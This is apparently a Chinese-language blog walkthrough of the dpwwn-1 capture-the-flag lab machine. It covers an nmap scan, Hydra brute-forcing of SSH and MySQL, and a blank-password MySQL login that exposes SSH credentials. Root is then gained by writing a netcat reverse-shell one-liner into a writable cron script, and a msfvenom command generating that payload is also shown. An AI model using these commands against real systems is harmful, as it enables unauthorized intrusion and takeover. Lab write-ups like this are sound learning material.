天道酬勤

dpwwn-1-WALKTHROUGH

一、主机发现

使用netdiscover,发现主机IP为192.168.203.145.

二、端口探测

使用Nmap

root@kali:~# nmap -sS -A 192.168.203.145 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 08:49 CST
Nmap scan report for 192.168.203.145
Host is up (0.00051s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:openbsd:openssh:7.4: 
|     	CVE-2018-15919	5.0	https://vulners.com/cve/CVE-2018-15919
|_    	CVE-2017-15906	5.0	https://vulners.com/cve/CVE-2017-15906
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /info.php: Possible information file
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
| vulners: 
|   cpe:/a:apache:http_server:2.4.6: 
|     	CVE-2017-7679	7.5	https://vulners.com/cve/CVE-2017-7679
|     	CVE-2018-1312	6.8	https://vulners.com/cve/CVE-2018-1312
|     	CVE-2017-15715	6.8	https://vulners.com/cve/CVE-2017-15715
|     	CVE-2014-0226	6.8	https://vulners.com/cve/CVE-2014-0226
|     	CVE-2017-9788	6.4	https://vulners.com/cve/CVE-2017-9788
|     	CVE-2019-0217	6.0	https://vulners.com/cve/CVE-2019-0217
|     	CVE-2019-10098	5.8	https://vulners.com/cve/CVE-2019-10098
|     	CVE-2019-0220	5.0	https://vulners.com/cve/CVE-2019-0220
|     	CVE-2018-17199	5.0	https://vulners.com/cve/CVE-2018-17199
|     	CVE-2017-9798	5.0	https://vulners.com/cve/CVE-2017-9798
|     	CVE-2017-15710	5.0	https://vulners.com/cve/CVE-2017-15710
|     	CVE-2016-8743	5.0	https://vulners.com/cve/CVE-2016-8743
|     	CVE-2016-2161	5.0	https://vulners.com/cve/CVE-2016-2161
|     	CVE-2016-0736	5.0	https://vulners.com/cve/CVE-2016-0736
|     	CVE-2014-3523	5.0	https://vulners.com/cve/CVE-2014-3523
|     	CVE-2014-0231	5.0	https://vulners.com/cve/CVE-2014-0231
|     	CVE-2014-0098	5.0	https://vulners.com/cve/CVE-2014-0098
|     	CVE-2013-6438	5.0	https://vulners.com/cve/CVE-2013-6438
|     	CVE-2019-10092	4.3	https://vulners.com/cve/CVE-2019-10092
|     	CVE-2016-4975	4.3	https://vulners.com/cve/CVE-2016-4975
|     	CVE-2015-3185	4.3	https://vulners.com/cve/CVE-2015-3185
|     	CVE-2014-8109	4.3	https://vulners.com/cve/CVE-2014-8109
|     	CVE-2014-0118	4.3	https://vulners.com/cve/CVE-2014-0118
|     	CVE-2014-0117	4.3	https://vulners.com/cve/CVE-2014-0117
|     	CVE-2013-4352	4.3	https://vulners.com/cve/CVE-2013-4352
|     	CVE-2018-1283	3.5	https://vulners.com/cve/CVE-2018-1283
|_    	CVE-2016-8612	3.3	https://vulners.com/cve/CVE-2016-8612
3306/tcp open  mysql   MySQL 5.5.60-MariaDB
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   MySQL 5.5.60-MariaDB: 
|_    	NODEJS:602	0.0	https://vulners.com/nodejs/NODEJS:602
MAC Address: 00:0C:29:79:43:8D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms 192.168.203.145

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.70 seconds

目标机器开放了22803306

三、漏洞寻找

通过Nmap的检测发现了一个info.php,我们先访问一下web服务。

是一个网站的测试页。

查看info.php:

接下来,利用dirb对目录进行扫描:

也是没有什么新发现的,那就只剩下爆破ssh和mysql了。

爆破工具使用Hydra

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.203.145
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.203.145

爆破了很久也没有成功,最终发现mysql是一个空密码登录!

我们直接使用mysql -h 192.168.203.145 -u root -p登录:

经过一番查找,最终在ssh数据库中,找到了一个ssh账号和密码:

MariaDB [ssh]> select * from users;
+----+----------+---------------------+
| id | username | password            |
+----+----------+---------------------+
|  1 | mistic   | testP@$$swordmistic |
+----+----------+---------------------+

四、提权

使用命令:ssh -p22 mistic@192.168.203.145,连接ssh。

成功登录!

现在我们必须拿到root权限才可以读取/root目录下的flag。

使用sudo -l发现,该用户并不可以执行:

使用find / type f -perm -u=s 2>/dev/null,查找suid权限的程序。

发现了计划任务crontab。或许我们可以利用此进行提权。

查看计划任务:cat /etc/crontab

发现果然有一个root用户运行的脚本,并且当前用户mistic对此脚本可写!

我们使用命令:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.203.129 7777 >/tmp/f" > logrot.sh

将反弹shell的代码写入logrot.sh

>>>的区别,前者是将文件内容覆盖,后者是追加。

之前在做DC-7的时候,不知道这个命令咋搞出来的,现在知道了,是msf的命令。如下:

msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.203.129 LPORT=7777 R

言归正传,写入命令之后,我们开启监听nc -lvp 7777,稍等一会儿我们便拿到了root的shell。

成功读取flag。

 

赞(3) 打赏
未经允许不得转载:HackerGu‘s Blog » dpwwn-1-WALKTHROUGH
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

专注黑客技术的研究

联系我们联系我们

觉得文章有用就打赏一下文章作者

微信扫一扫打赏